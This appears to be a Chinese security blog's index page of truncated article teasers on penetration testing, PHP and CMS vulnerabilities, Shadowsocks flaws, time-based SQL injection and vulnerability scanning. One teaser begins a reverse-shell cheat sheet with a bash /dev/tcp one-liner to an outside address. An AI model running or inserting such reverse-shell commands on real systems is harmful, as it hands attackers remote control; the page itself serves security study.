介绍CloudFlare Workers是一个支持jsproxy的无服务器函数服务，提供全球CDN支持，免费用户有每天10万请求额度；CloudFlare官网：https://dash.cloudflare.com记录下一些简单的使用方法，以后再...

渗透测试指南系列文章内容纲要：第一章 渗透测试简介第二章 前期交互第三章 信息收集第四章 漏洞识别第五章 社会工程学第六章 有线/无线网络利用第七章 基于应用的漏洞利用第八章 基于本地主机...

继续来研究常见的php代码漏洞！ 11. <?php error_reporting(0); $link = mysql_connect('localhost', 'root', ''); if (!$link) { die('Could not conne...

前言 10月13号X41 D-Sec组织披露了有关Shadowsocks的一些漏洞，文章在此。以下对文中提及的日志文件写入和命令执行漏洞进行简要分析。 漏洞细节还是很简单的，但其中涉及到了一些小技巧还是可以...

前言：本来提交给了cnvd平台，竟然被驳回，原因是semcms v2.2就已经存在了这个漏洞，那么问题来了，这个锅难道是我们背？（无力吐槽厂商。。） SemCms是一套开源外贸企业网站管理系统，主要用于...

原文链接：https://xianzhi.aliyun.com/forum/topic/1492/ 作者：ADog 关于代理，可能我了解的就是简单的web代理，再加上渗透时需要用到的内网转发，最后可能就是上次去了解的nginx反向代理，下...

author:cdxy PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数，引发对时间盲注中延时方法的思考。 延时函数 mysql> select sleep(5); +----------+ | sleep(5) ...

author：waitalone 1.bash版本 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 1 bash -i >& /dev/tcp/10.0.0.1/8...

0x00 前记 这里的漏洞分析只挑选了两个觉得有新意的点来说，整个cms肯定还是有很多漏洞，可以说是值得练手的一款cms，并且由于是根据某付费cms二次制作完成，因此市面上这类汽车网源码肯定也是...

最近参与到一个漏扫项目当中，针对nessus和openvas比对后，发现基于openvas开发的扫描器更有优势，主要体现在openvas的命令行可以直接添加扫描ip、扫描方式和最后的报告导出，这就会帮助开发公...